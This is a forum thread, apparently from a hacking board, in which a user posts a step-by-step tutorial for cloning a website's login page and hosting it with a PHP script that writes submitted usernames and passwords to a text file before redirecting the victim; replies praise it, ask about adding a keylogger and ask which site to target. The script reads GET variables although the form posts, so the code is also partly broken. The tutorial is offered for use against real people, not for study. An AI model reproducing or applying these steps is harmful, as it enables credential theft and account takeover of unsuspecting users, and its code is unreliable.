[m3k0]

Hi all! heres my tutorial and its gonna be on Phishing!

allright lets get started!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this
<form action="RANDOM URL" method="post" autocomplete="off">
or anything alike.

4. change the url (in this case "RANDOM URL") to "next.php"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of [Only registered and activated users can see links. ]. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called next.php and copy / paste this:

<?php
header("Location: [Only registered and activated users can see links. ] ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: worldofwarcraft.com ");

11. Save this file (next.php)

12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

14. if its not typed there you should try editing "next.php" and enter this instead:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

i think you know what to do with the "RANDOM" url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "passwords.txt" instead of "pass.txt"

15. just upload all the files in the folder to the file manager and the phisher is ready for use!

[Reshnakl]

Thanks for the tutorial

[strobel]

Good job!

[Monty]

Quote:

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

according to your code its passwordS.txt actually

[Monty]

oh, is there a way to add keylogger to the site?

[sOuLii]

nice ! thanks for the guide

[m3k0]

Quote:

Originally Posted by Monty

oh, is there a way to add keylogger to the site?

well its a phising site ....

[groblie]

Uhm i can't find <form action="RANDOM URL" method="post" autocomplete="off">
just,
<form method="post" name="login_form"> is it the same?

btw can someone give me a tip on what website to use?

[Brian Peppers]

Quote:

Originally Posted by groblie

Uhm i can't find <form action="RANDOM URL" method="post" autocomplete="off">
just,
<form method="post" name="login_form"> is it the same?

btw can someone give me a tip on what website to use?

Yeah i cant find that ether